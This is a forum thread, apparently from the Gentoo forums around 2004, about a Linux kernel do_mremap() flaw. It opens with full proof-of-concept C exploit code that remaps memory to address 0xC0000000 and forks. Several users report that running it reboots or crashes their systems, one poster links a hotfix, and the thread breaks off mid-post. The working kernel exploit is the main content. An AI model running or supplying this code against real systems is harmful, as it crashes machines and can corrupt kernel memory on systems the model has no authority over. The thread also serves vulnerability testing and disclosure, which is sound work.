mremap test util :-))) or kill you Penguin

Bash[DevNull] · Guru Joined: 10 Oct 2003 Posts: 333

/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
_________________
Biomechanical Artificial Sabotage Humanoid

Bash[DevNull] · Guru Joined: 10 Oct 2003 Posts: 333

Heh, for stable (x86) 2.4.22-gentoo-r2 kernel with GRSECURITY PATCH don't work.

I have no time to rewrite and test util, but i think it can be...
Alll in this small code...

#ifdef CONFIG_GRKERNSEC_PAX_SEGMEXEC
if ((current->flags & PF_PAX_SEGMEXEC) &&
(new_len > SEGMEXEC_TASK_SIZE || new_addr > SEGMEXEC_TASK_SIZE-new_len))
goto out;
#endif
_________________
Biomechanical Artificial Sabotage Humanoid

drspewfy · Posted: Tue Jan 06, 2004 11:14 am Post subject: i cant install lsof and login

I compiled the exploitt..
and.. when i run it..
./mremap
my system got rebooted, my sistem rebooted suddenly in 2 seconds..
why ??
doesnt give root ??'

my kernel is
2.4.20-gentoo-r5
and i tried with other kernell in other system and i got the same,,
rebooted the system
with the r9.

well see ya
=)))
i hope you some help..
or how to fix the vulnerability

Bash[DevNull] · Guru Joined: 10 Oct 2003 Posts: 333

It is not exploit that give you root priv. It is proof-of-concept exploit, it is mean - show that you system have this bug and only.

Hot-Fix can be found there https://forums.gentoo.org/viewtopic.php?t=121529
_________________
Biomechanical Artificial Sabotage Humanoid

drspewfy · Posted: Tue Jan 06, 2004 12:22 pm Post subject:

YES but when i try the exploit
i get rebooted the system
....
:S
weird

fleed · l33t Joined: 28 Aug 2002 Posts: 756 Location: London

Do you mean that the hotfix that Bash pointed to is worthless?

Simba · n00b Joined: 08 Nov 2002 Posts: 60

It doesn't work with my kernel although my kernel is an old 2.4.20-xfs-r3
kernel. ./mremap just quit with Segmentation fault, thats all.

RAPUL · Posted: Thu Jan 08, 2004 4:38 pm Post subject: It doesn't work...

It does nothing for me.

I am still using an old gentoo-sources-2.4.20-r7 which has been without rebooting 80 days...
_________________
Entropy rulz world.
Redundancy sux.
World is full of redundancy.
World sux.

donwimani · n00b Joined: 05 Mar 2004 Posts: 19

Hi,

I was trying to understand how exactly the code makes the kernel crash.

sys_real_mremap() is declared by the code: